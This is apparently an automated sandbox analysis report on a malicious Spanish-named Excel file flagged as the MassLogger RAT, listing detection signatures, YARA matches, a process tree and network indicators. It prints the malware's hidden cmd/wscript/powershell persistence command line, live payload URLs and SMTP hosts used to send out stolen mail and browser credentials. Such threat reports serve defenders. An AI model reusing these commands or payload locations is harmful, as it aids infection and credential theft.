
Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name: LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID: 356267
MD5: 8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1: 61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256: 35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags: ESP, geo, Outlook, xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected MassLogger RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the startup folder
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7032 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • a.exe (PID: 6200 cmdline: C:\PROGRAMDATA\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
      • cmd.exe (PID: 6632 cmdline: cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 2860 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • wscript.exe (PID: 4180 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • powershell.exe (PID: 5596 cmdline: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • a.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
            • a.exe (PID: 5508 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
  • a.exe (PID: 740 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
    • a.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
    • a.exe (PID: 5036 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth |
  • 0xfc8d:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xfb72:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x1030c:$op3: 00 04 03 69 91 1B 40
  • 0x11a0b:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth |
  • 0x84d:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x732:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xecc:$op3: 00 04 03 69 91 1B 40
  • 0x25cb:$op3: 00 04 03 69 91 1B 40
(table truncated; 50 entries in the full report)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.a.exe.39bc1e0.1.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
1.2.a.exe.39bc1e0.1.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
11.2.a.exe.3a9c1e0.1.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
11.2.a.exe.3a9c1e0.1.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
1.2.a.exe.6e20000.4.raw.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
(table truncated; 52 entries in the full report)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://pastex.pro | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\a.exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe | ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe | Joe Sandbox ML: detected
Source: C:\ProgramData\a.exe | Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\PROGRAMDATA\a.exe
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: mensajeria_system[1].exe.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\ProgramData\a.exe
Source: global traffic | DNS query: name: www.seyranikenger.com.tr
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
Source: global traffic | HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1  Host: pastex.pro  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: api.ipify.org  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 54.225.220.115 54.225.220.115
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp | String found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: www.seyranikenger.com.tr
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.org
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.org/
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.org4
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.orgD
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify8
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp | String found in binary or memory: http://pastex.pro
Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.dr | String found in binary or memory: http://pastex.pro/b/AEmdBGcmp
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://smtp.saleforceconsults.com
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://augloop.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://augloop.office.com/v2
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.entity.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cortana.ai/api
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cr.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev.cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://devnull.onenote.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://directory.services.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/PesterP
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                  Source: powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.ppe.windows.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.ppe.windows.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.windows.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.windows.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://lifecycle.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.microsoftonline.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.local
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://management.azure.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://management.azure.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://messaging.office.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ncus-000.contentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officeapps.live.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com/embed?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerlift.acompli.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
                  Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com4
                  Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp | String found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg
                  Source: unknown | HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
